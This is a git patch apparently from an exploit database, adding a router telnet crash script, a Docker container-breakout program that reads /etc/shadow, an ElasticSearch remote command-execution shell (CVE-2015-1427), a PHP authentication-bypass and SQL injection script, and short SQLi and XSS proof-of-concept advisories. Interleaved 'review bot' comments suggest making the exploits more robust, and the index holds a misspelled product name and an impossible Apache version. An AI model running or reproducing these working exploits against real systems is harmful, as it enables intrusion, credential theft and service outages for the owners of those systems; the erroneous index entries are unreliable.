From f8f13f8ec0687aa5441e91ecd8ede11aeb7b1415 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Fri, 13 Mar 2015 08:35:51 +0000 Subject: [PATCH] Update: 2015-03-13 22 new exploits --- files.csv | 26 ++++- platforms/hardware/dos/36309.py | 40 +++++++ platforms/linux/local/33808.c | 193 +++++++++++++++---------------- platforms/linux/remote/36337.py | 56 +++++++++ platforms/linux/remote/36352.txt | 10 ++ platforms/php/webapps/36305.txt | 47 ++++++++ platforms/php/webapps/36306.txt | 151 ++++++++++++++++++++++++ platforms/php/webapps/36338.txt | 9 ++ platforms/php/webapps/36339.txt | 11 ++ platforms/php/webapps/36340.txt | 9 ++ platforms/php/webapps/36341.txt | 10 ++ platforms/php/webapps/36342.txt | 11 ++ platforms/php/webapps/36343.txt | 10 ++ platforms/php/webapps/36344.txt | 10 ++ platforms/php/webapps/36345.txt | 10 ++ platforms/php/webapps/36346.txt | 16 +++ platforms/php/webapps/36347.txt | 10 ++ platforms/php/webapps/36348.txt | 9 ++ platforms/php/webapps/36349.txt | 12 ++ platforms/php/webapps/36350.txt | 7 ++ platforms/php/webapps/36351.txt | 7 ++ platforms/windows/dos/36334.txt | 69 +++++++++++ platforms/windows/dos/36335.txt | 68 +++++++++++ platforms/windows/dos/36336.txt | 73 ++++++++++++ 24 files changed, 775 insertions(+), 99 deletions(-) create mode 100755 platforms/hardware/dos/36309.py create mode 100755 platforms/linux/remote/36337.py create mode 100755 platforms/linux/remote/36352.txt create mode 100755 platforms/php/webapps/36305.txt create mode 100755 platforms/php/webapps/36306.txt create mode 100755 platforms/php/webapps/36338.txt create mode 100755 platforms/php/webapps/36339.txt create mode 100755 platforms/php/webapps/36340.txt create mode 100755 platforms/php/webapps/36341.txt create mode 100755 platforms/php/webapps/36342.txt create mode 100755 platforms/php/webapps/36343.txt create mode 100755 platforms/php/webapps/36344.txt create mode 100755 platforms/php/webapps/36345.txt create mode 100755 platforms/php/webapps/36346.txt create mode 100755 platforms/php/webapps/36347.txt create mode 100755 
platforms/php/webapps/36348.txt create mode 100755 platforms/php/webapps/36349.txt create mode 100755 platforms/php/webapps/36350.txt create mode 100755 platforms/php/webapps/36351.txt create mode 100755 platforms/windows/dos/36334.txt create mode 100755 platforms/windows/dos/36335.txt create mode 100755 platforms/windows/dos/36336.txt diff --git a/files.csv b/files.csv index a69e47a4a..36e7b5f83 100755 --- a/files.csv +++ b/files.csv @@ -7391,7 +7391,7 @@ id,file,description,date,author,platform,type,port 7853,platforms/windows/local/7853.pl,"EleCard MPEG PLAYER - (.m3u ) Local Stack Overflow Exploit",2009-01-25,AlpHaNiX,windows,local,0 7854,platforms/windows/dos/7854.pl,"MediaMonkey 3.0.6 - (.m3u) Local Buffer Overflow PoC",2009-01-25,AlpHaNiX,windows,dos,0 7855,platforms/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 -7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 +7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 m3u file Local Buffer Overflow PoC",2009-01-25,Houssamix,windows,dos,0 7858,platforms/hardware/remote/7858.php,"Siemens ADSL SL2-141 - CSRF Exploit",2009-01-25,spdr,hardware,remote,0 7859,platforms/php/webapps/7859.pl,"MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit",2009-01-25,StAkeR,php,webapps,0 
@@ -30456,7 +30456,7 @@ id,file,description,date,author,platform,type,port 33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0 33805,platforms/linux/remote/33805.pl,"AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote,0 33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888 -33808,platforms/linux/local/33808.c,"docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0 +33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0 33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0 33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0 33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0 
@@ -32724,8 +32724,11 @@ id,file,description,date,author,platform,type,port 36302,platforms/php/webapps/36302.txt,"Joomla Content Component 'year' Parameter SQL Injection Vulnerability",2011-11-14,E.Shahmohamadi,php,webapps,0 36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection Vulnerability",2015-03-06,"ITAS Team",php,webapps,80 36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 Remote Command Execution",2015-03-06,metasploit,windows,remote,5555 +36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection Vulnerability",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0 +36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass And SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0 36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 admin_index.php SITE_NAME Parameter XSS",2011-11-13,"Gjoko Krstic",php,webapps,0 36308,platforms/php/webapps/36308.txt,"Webistry 1.6 'pid' Parameter SQL Injection Vulnerability",2011-11-16,CoBRa_21,php,webapps,0 +36309,platforms/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash PoC",2015-03-08,"Loudiyi Mohamed",hardware,dos,0 36310,platforms/lin_x86-64/local/36310.txt,"Rowhammer: Linux Kernel Privilege Escalation PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0 36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer: NaCl Sandbox Escape PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0 36313,platforms/php/webapps/36313.txt,"webERP <= 4.3.8 Multiple Script URI XSS",2011-11-17,"High-Tech Bridge SA",php,webapps,0 
@@ -32749,3 +32752,22 @@ id,file,description,date,author,platform,type,port 36331,platforms/php/webapps/36331.txt,"Dolibarr ERP/CRM /user/index.php Multiple Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 36332,platforms/php/webapps/36332.txt,"Dolibarr ERP/CRM /user/info.php id Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 36333,platforms/php/webapps/36333.txt,"Dolibarr ERP/CRM /admin/boxes.php rowid Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0 +36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0 +36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0 +36336,platforms/windows/dos/36336.txt,"Microsoft Windows Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0 +36337,platforms/linux/remote/36337.py,"ElasticSearch Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200 +36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0 +36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 'snum' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0 +36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0 +36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0 +36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/googlemap.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0 
+36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 /modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition Parameter XSS",2011-11-23,Prestashop,php,webapps,0 +36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 /admin/ajaxfilemanager/ajax_save_text.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0 +36345,platforms/php/webapps/36345.txt,"Prestashop 1.4.4.1 'displayImage.php' HTTP Response Splitting Vulnerability",2011-11-23,RGouveia,php,webapps,0 +36346,platforms/php/webapps/36346.txt,"Zen Cart CMS 1.3.9h Multiple Cross Site Scripting Vulnerabilities",2011-11-23,RPinto,php,webapps,0 +36347,platforms/php/webapps/36347.txt,"Hastymail2 'rs' Parameter Cross Site Scripting Vulnerability",2011-11-22,HTrovao,php,webapps,0 +36348,platforms/php/webapps/36348.txt,"Pro Clan Manager 0.4.2 SQL Injection Vulnerability",2011-11-23,anonymous,php,webapps,0 +36349,platforms/php/webapps/36349.txt,"AdaptCMS 2.0 SQL Injection Vulnerability",2011-11-24,X-Cisadane,php,webapps,0 +36350,platforms/php/webapps/36350.txt,"Balitbang CMS 3.3 index.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 +36351,platforms/php/webapps/36351.txt,"alitbang CMS 3.3 alumni.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0 +36352,platforms/linux/remote/36352.txt,"Apache HTTP Server 7.0.x 'mod_proxy' Reverse Proxy Security Bypass Vulnerability",2011-11-24,"Prutha Parikh",linux,remote,0 diff --git a/platforms/hardware/dos/36309.py b/platforms/hardware/dos/36309.py new file mode 100755 index 000000000..b3e2ae1fe --- /dev/null +++ b/platforms/hardware/dos/36309.py 
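Review bot: The new row for 36351 spells the product `alitbang CMS 3.3 alumni.php hal Parameter SQL Injection` while the 36350 row directly above it has `Balitbang CMS 3.3`, so the leading `B` has been dropped in the index entry. The 36352 row gives the affected version as `Apache HTTP Server 7.0.x`, but no httpd release line with that number exists and the advisory text added in 36352.txt names no version at all, so the figure should be checked against the BID source before it is indexed. The description fixes in the first two hunks (`MySQL 4/5/6 -`, `Docker 0.11 -`) are consistent with the surrounding rows.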
@@ -0,0 +1,40 @@
+# Title : Sagem F@st 3304-V2 Telnet Crash POC
+# Vendor : http://www.sagemcom.com
+# Severity : High
+# Tested Router : Sagem F@st 3304-V2 (3304-V1, other versions may also be affected)
+# Date : 2015-03-08
+# Author : Loudiyi Mohamed
+# Contact : Loudiyi.2010@gmail.com
+# Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603
+# Vulnerability description:
+#==========================
+#A Memory Corruption Vulnerability is detected on Sagem F@st 3304-V2 Telnet service. An attacker can crash the router by sending a very long string.
+#This exploit connects to Sagem F@st 3304-V2 Telnet (Default port 23) and sends a very long string "X"*500000.
+#After the exploit is sent, the telnet service will crash and the router will reboot automatically.
+
+#Usage: python SagemDos.py "IP address"
+
+# Code
+#========================================================================
+ #!/usr/bin/python
+import socket
+import sys
+print("######################################")
+print("# DOS Sagem F@st3304 v1-v2 #")
+print("# ---------- #")
+print("# BY LOUDIYI MOHAMED #")
+print("#####################################")
+if (len(sys.argv)<2):
+ print "Usage: %s " % sys.argv[0]
+ print "Example: %s 192.168.1.1 " % sys.argv[0]
+ exit(0)
+print "\nSending evil buffer..."
+s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+try:
+ s.connect((sys.argv[1], 23))
+ buffer = "X"*500000
+ s.send(buffer)
+except:
+ print "Could not connect to Sagem Telnet!"
+#========================================================================
+
diff --git a/platforms/linux/local/33808.c b/platforms/linux/local/33808.c
index 59c57da8f..fa166d47b 100755
--- a/platforms/linux/local/33808.c
+++ b/platforms/linux/local/33808.c
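Review bot: The bare `except:` that closes the script catches every exception, including KeyboardInterrupt and any error raised by `s.send`, and reports all of them as `Could not connect to Sagem Telnet!`; it should be `except socket.error as e:` with `e` included in the message so a refused connection is distinguishable from a send that failed part-way. The socket is never closed on either path; a `finally:` with `s.close()` after the handler would cover both. The `#!/usr/bin/python` line is indented and placed after the header comments, so it is not honoured as a shebang, and the `print "..."` statements make the file Python 2 only, which the header's `#Usage: python SagemDos.py` line should state. The header also classifies this as a "Memory Corruption Vulnerability", but nothing in the file supports that beyond the observed crash and reboot on a 500000-byte input, so the description should say what was actually observed.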
@@ -47,142 +47,141 @@ struct my_file_handle { - unsigned int handle_bytes; - int handle_type; - unsigned char f_handle[8]; + unsigned int handle_bytes; + int handle_type; + unsigned char f_handle[8]; }; void die(const char *msg) { - perror(msg); - exit(errno); + perror(msg); + exit(errno); } void dump_handle(const struct my_file_handle *h) { - fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes, - h->handle_type); - for (int i = 0; i < h->handle_bytes; ++i) { - fprintf(stderr,"0x%02x", h->f_handle[i]); - if ((i + 1) % 20 == 0) - fprintf(stderr,"\n"); - if (i < h->handle_bytes - 1) - fprintf(stderr,", "); - } - fprintf(stderr,"};\n"); + fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes, + h->handle_type); + for (int i = 0; i < h->handle_bytes; ++i) { + fprintf(stderr,"0x%02x", h->f_handle[i]); + if ((i + 1) % 20 == 0) + fprintf(stderr,"\n"); + if (i < h->handle_bytes - 1) + fprintf(stderr,", "); + } + fprintf(stderr,"};\n"); } int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh) { - int fd; - uint32_t ino = 0; - struct my_file_handle outh = { - .handle_bytes = 8, - .handle_type = 1 - }; - DIR *dir = NULL; - struct dirent *de = NULL; + int fd; + uint32_t ino = 0; + struct my_file_handle outh = { + .handle_bytes = 8, + .handle_type = 1 + }; + DIR *dir = NULL; + struct dirent *de = NULL; - path = strchr(path, '/'); + path = strchr(path, '/'); - // recursion stops if path has been resolved - if (!path) { - memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle)); - oh->handle_type = 1; - oh->handle_bytes = 8; - return 1; - } - ++path; - fprintf(stderr, "[*] Resolving '%s'\n", path); + // recursion stops if path has been resolved + if (!path) { + memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle)); + oh->handle_type = 1; + oh->handle_bytes = 8; + return 1; + } + ++path; + fprintf(stderr, "[*] Resolving '%s'\n", path); - if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0) - 
die("[-] open_by_handle_at"); + if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0) + die("[-] open_by_handle_at"); - if ((dir = fdopendir(fd)) == NULL) - die("[-] fdopendir"); + if ((dir = fdopendir(fd)) == NULL) + die("[-] fdopendir"); - for (;;) { - de = readdir(dir); - if (!de) - break; - fprintf(stderr, "[*] Found %s\n", de->d_name); - if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) { - fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino); - ino = de->d_ino; - break; - } - } + for (;;) { + de = readdir(dir); + if (!de) + break; + fprintf(stderr, "[*] Found %s\n", de->d_name); + if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) { + fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino); + ino = de->d_ino; + break; + } + } - fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n"); + fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n"); - if (de) { - for (uint32_t i = 0; i < 0xffffffff; ++i) { - outh.handle_bytes = 8; - outh.handle_type = 1; - memcpy(outh.f_handle, &ino, sizeof(ino)); - memcpy(outh.f_handle + 4, &i, sizeof(i)); + if (de) { + for (uint32_t i = 0; i < 0xffffffff; ++i) { + outh.handle_bytes = 8; + outh.handle_type = 1; + memcpy(outh.f_handle, &ino, sizeof(ino)); + memcpy(outh.f_handle + 4, &i, sizeof(i)); - if ((i % (1<<20)) == 0) - fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i); - if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) { - closedir(dir); - close(fd); - dump_handle(&outh); - return find_handle(bfd, path, &outh, oh); - } - } - } + if ((i % (1<<20)) == 0) + fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i); + if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) { + closedir(dir); + close(fd); + dump_handle(&outh); + return find_handle(bfd, path, &outh, oh); + } + } + } - closedir(dir); - close(fd); - return 0; + closedir(dir); + close(fd); + return 0; } int main() { - char 
buf[0x1000]; - int fd1, fd2; - struct my_file_handle h; - struct my_file_handle root_h = { - .handle_bytes = 8, - .handle_type = 1, - .f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0} - }; + char buf[0x1000]; + int fd1, fd2; + struct my_file_handle h; + struct my_file_handle root_h = { + .handle_bytes = 8, + .handle_type = 1, + .f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0} + }; - fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" - "[***] The tea from the 90's kicks your sekurity again. [***]\n" - "[***] If you have pending sec consulting, I'll happily [***]\n" - "[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); + fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n" + "[***] The tea from the 90's kicks your sekurity again. [***]\n" + "[***] If you have pending sec consulting, I'll happily [***]\n" + "[***] forward to my friends who drink secury-tea too! [***]\n\n\n"); - read(0, buf, 1); + read(0, buf, 1); - // get a FS reference from something mounted in from outside - if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0) - die("[-] open"); + // get a FS reference from something mounted in from outside + if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0) + die("[-] open"); - if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0) - die("[-] Cannot find valid handle!"); + if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0) + die("[-] Cannot find valid handle!"); - fprintf(stderr, "[!] Got a final handle!\n"); - dump_handle(&h); + fprintf(stderr, "[!] Got a final handle!\n"); + dump_handle(&h); - if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0) - die("[-] open_by_handle"); + if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0) + die("[-] open_by_handle"); - memset(buf, 0, sizeof(buf)); - if (read(fd2, buf, sizeof(buf) - 1) < 0) - die("[-] read"); + memset(buf, 0, sizeof(buf)); + if (read(fd2, buf, sizeof(buf) - 1) < 0) + die("[-] read"); - fprintf(stderr, "[!] Win! 
/etc/shadow output follows:\n%s\n", buf); + fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf); - close(fd2); close(fd1); + close(fd2); close(fd1); - return 0; + return 0; } - diff --git a/platforms/linux/remote/36337.py b/platforms/linux/remote/36337.py new file mode 100755 index 000000000..0f25c542c --- /dev/null +++ b/platforms/linux/remote/36337.py 
@@ -0,0 +1,56 @@ +#!/bin/python2 +# coding: utf-8 +# Author: Darren Martyn, Xiphos Research Ltd. +# Version: 20150309.1 +# Licence: WTFPL - wtfpl.net +import json +import requests +import sys +import readline +readline.parse_and_bind('tab: complete') +readline.parse_and_bind('set editing-mode vi') +__version__ = "20150309.1" + +def banner(): + print """\x1b[1;32m +?????? ??? ??? ?????? ????????? ??? ?????? ?????? ??? ?? ?????? ??? ??? +?? ? ???? ?????? ??? ? ? ??? ?????????? ?? ??? ? ???? ????? ? ???? ???? +???? ???? ??? ??? ? ???? ? ???? ????????? ? ? ???? ???????????? ???? ???? +??? ? ???? ????????? ? ???? ???? ? ???????? ???? ? ?????? ??? ??? ? ???? ???? +????????????????? ????????????? ???? ? ????? ????? ????????????????????????????????????????? +?? ?? ?? ??? ??? ????? ??? ? ? ? ?? ?? ? ?? ? ?? ??? ? ? ? ??????? ?? ?? ??? ?? ??? ? + ? ? ?? ? ? ? ? ?? ?? ?? ? ? ? ? ? ? ? ? ?? ? ? ? ??? ? ? ? ?? ? ? ?? ? ? ? + ? ? ? ? ? ? ? ? ? ? ?? ? ? ? ? ?? ? ? ? ? ? ? + ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? + ? + Exploit for ElasticSearch , CVE-2015-1427 Version: %s\x1b[0m""" %(__version__) + +def execute_command(target, command): + payload = """{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"}}}""" %(command) + try: + url = "http://%s:9200/_search?pretty" %(target) + r = requests.post(url=url, data=payload) + except Exception, e: + sys.exit("Exception Hit"+str(e)) + values = json.loads(r.text) + fuckingjson = values['hits']['hits'][0]['fields']['lupin'][0] + print fuckingjson.strip() + + +def exploit(target): + print "{*} Spawning Shell on target... Do note, its only semi-interactive... 
Use it to drop a better payload or something"
+ while True:
+ cmd = raw_input("~$ ")
+ if cmd == "exit":
+ sys.exit("{!} Shell exiting!")
+ else:
+ execute_command(target=target, command=cmd)
+
+def main(args):
+ banner()
+ if len(args) != 2:
+ sys.exit("Use: %s target" %(args[0]))
+ exploit(target=args[1])
+
+if __name__ == "__main__":
+ main(args=sys.argv)
\ No newline at end of file
diff --git a/platforms/linux/remote/36352.txt b/platforms/linux/remote/36352.txt
new file mode 100755
index 000000000..962b34639
--- /dev/null
+++ b/platforms/linux/remote/36352.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/50802/info
+
+Apache HTTP Server is prone to a security-bypass vulnerability.
+
+Successful exploits will allow attackers to bypass certain security restrictions and obtain sensitive information about running web applications.
+
+The following example patterns are available:
+
+RewriteRule ^(.*) http://www.example.com$1
+ProxyPassMatch ^(.*) http://www.example.com$1
\ No newline at end of file
diff --git a/platforms/php/webapps/36305.txt b/platforms/php/webapps/36305.txt
new file mode 100755
index 000000000..36949af14
--- /dev/null
+++ b/platforms/php/webapps/36305.txt
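Review bot: `execute_command` indexes `values['hits']['hits'][0]['fields']['lupin'][0]` with no check on the response shape, so a reply whose `hits` list is empty or an error document from the server ends the `exploit` loop with an uncaught KeyError/IndexError traceback instead of a message; the `try`/`except` above it only wraps the `requests.post` call, so the lookup needs its own guard (for example `hits = values.get('hits', {}).get('hits')` followed by `if not hits:` reporting the raw body). `requests.post` is also called without `timeout=`, so a target that accepts the TCP connection and never answers blocks the loop indefinitely. The `except Exception, e:` form and the `print` statements make the file Python 2 only, which the `#!/bin/python2` shebang acknowledges, but `/bin/python2` is not a portable interpreter path; `#!/usr/bin/env python2` is the usual form. `execute_command` and the start of `exploit` lie on the previous physical line of this hunk.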
@@ -0,0 +1,47 @@ +# Title: Elastix v2.x Blind SQL Injection Vulnerability +# Author: Ahmed Aboul-Ela +# Twitter: https://twitter.com/aboul3la +# Vendor : http://www.elastix.org +# Version: v2.5.0 and prior versions should be affected too + +- Vulnerable Source Code snippet in "a2billing/customer/iridium_threed.php": + + SQLExec ($DBHandle_max, $QUERY); + [...] + ?> + + The GET parameter transactionID was used directly in the SQL query + without any sanitization which lead directly to SQL Injection vulnerability. + +- Proof of Concept: + + http://[host]/a2billing/customer/iridium_threed.php?transactionID=-1 and 1=benchmark(2000000,md5(1)) + + The backend response will delay for few seconds, which means the benchmark() function was executed successfully + +- Mitigation: + + The vendor has released a fix for the vulnerability. It is strongly recommended to update your elastix server now + + [~] yum update elastix-a2billing + + +- Time-Line: + + Sat, Feb 14, 2015 at 2:19 PM: Vulnerability report sent to Elastix + Wed, Feb 18, 2015 at 4:29 PM: Confirmation of the issue from Elastix + Fri, Mar 6, 2015 at 8:39 PM: Elastix released a fix for the vulnerability + Sat, Mar 7, 2015 at 5:15 PM: The public responsible disclosure + +- Credits: + + Ahmed Aboul-Ela - Cyber Security Analyst @ EG-CERT \ No newline at end of file diff --git a/platforms/php/webapps/36306.txt b/platforms/php/webapps/36306.txt new file mode 100755 index 000000000..11c864d6d --- /dev/null +++ b/platforms/php/webapps/36306.txt 
@@ -0,0 +1,151 @@ +getState()) && + (($user->getStatus() == "administrator") || + ($user->getStatus() == "betmaster"))){ + $mainhtml = file_get_contents("tpl/showprofile.inc"); + + $id = htmlspecialchars($_GET['id']); <<<< WTF !! + $xuser = $db_mapper->getUserById($id); +----------------------------------------------------------------------------- + +/categoryedit.php (LINE: 52) +----------------------------------------------------------------------------- +$id = htmlspecialchars($_GET['id']); <<<< WTF !! +$action = htmlspecialchars($_GET['ac']); +----------------------------------------------------------------------------- + +########################################### +VULNERABILITY: Authentication Bypass (SQLi) +########################################### + +File index.php (Login function) has SQL Injection vulnerability, "username" parameter supplied in POST parameter for checking valid credentials. +The "username" parameter is not validated before passing into SQL query which arise authentication bypass issue. 
+ +##################################################### +EXPLOIT +##################################################### + +*/ + +error_reporting(0); +set_time_limit(0); +ini_set("default_socket_timeout", 50); + +function http_send($host, $packet) +{ + if (!($sock = fsockopen($host, 80))) + die("\n[-] No response from {$host}:80\n"); + + fputs($sock, $packet); + return stream_get_contents($sock); +} + +print "\n+---------------------------------------------+"; +print "\n| Betster Auth Bypass & SQL Injection Exploit |"; +print "\n+---------------------------------------------+\n"; + +if ($argc < 3) +{ + print "\nUsage......: php $argv[0] \n"; + print "\nExample....: php $argv[0] localhost /"; + print "\nExample....: php $argv[0] localhost /betster/\n"; + die(); +} + +$host = $argv[1]; +$path = $argv[2]; + +$payload = "username=admin%27+or+%27a%27%3D%27a&password=cwh&login=LOGIN"; + +$packet = "GET {$path} HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Connection: close\r\n\r\n"; + + print "\n ,--^----------,--------,-----,-------^--, \n"; + print " | ||||||||| `--------' | O \n"; + print " `+---------------------------^----------| \n"; + print " `\_,-------, _________________________| \n"; + print " / XXXXXX /`| / \n"; + print " / XXXXXX / `\ / \n"; + print " / XXXXXX /\______( \n"; + print " / XXXXXX / \n"; + print " / XXXXXX / .. CWH Underground Hacking Team .. 
\n"; + print " (________( \n"; + print " `------' \n"; + +$response = http_send($host, $packet); + + if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n"); + +$packet = "POST {$path}index.php HTTP/1.0\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Cookie: {$sid[1]}\r\n"; +$packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; +$packet .= "Content-Length: ".strlen($payload)."\r\n"; +$packet .= "Connection: close\r\n\r\n{$payload}"; + + print "\n\n[+] Bypassing Authentication...\n"; + sleep(2); + +$response=http_send($host, $packet); + +preg_match('/menutitle">ADMIN/s', $response) ? print "\n[+] Authentication Bypass Successfully !!\n" : die("\n[-] Bypass Authentication Failed !!\n"); + +$packet = "GET {$path}showprofile.php?id=1%27%20and%201=2%20union%20select%201,concat(0x3a3a,0x557365723d,user(),0x202c2044425f4e616d653d,database(),0x3a3a),3,4,5,6,7--+ HTTP/1.0\r\n"; +$packet .= "Cookie: {$sid[1]}\r\n"; +$packet .= "Host: {$host}\r\n"; +$packet .= "Connection: close\r\n\r\n"; + + print "[+] Performing SQL Injection Attack\n"; + sleep(2); + +$response1=http_send($host, $packet); + +preg_match('/::(.*)::/', $response1, $m) ? print "\n$m[1]\n" : die("\n[-] Exploit failed!\n"); + +################################################################################################################ +# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 +################################################################################################################ +?> \ No newline at end of file diff --git a/platforms/php/webapps/36338.txt b/platforms/php/webapps/36338.txt new file mode 100755 index 000000000..b19a43537 --- /dev/null +++ b/platforms/php/webapps/36338.txt 
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/50778/info + +ClickDesk Live Support plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +ClickDesk Live Support 2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36339.txt b/platforms/php/webapps/36339.txt new file mode 100755 index 000000000..127b86dad --- /dev/null +++ b/platforms/php/webapps/36339.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/50779/info + +Featurific For WordPress plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Featurific For WordPress 1.6.2 is vulnerable; other versions may also be affected. + +UPDATE April 18, 2012: Further reports indicate this issue may not be a vulnerability; the issue can not be exploited as described. + +http://www.example.com/[path]/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36340.txt b/platforms/php/webapps/36340.txt new file mode 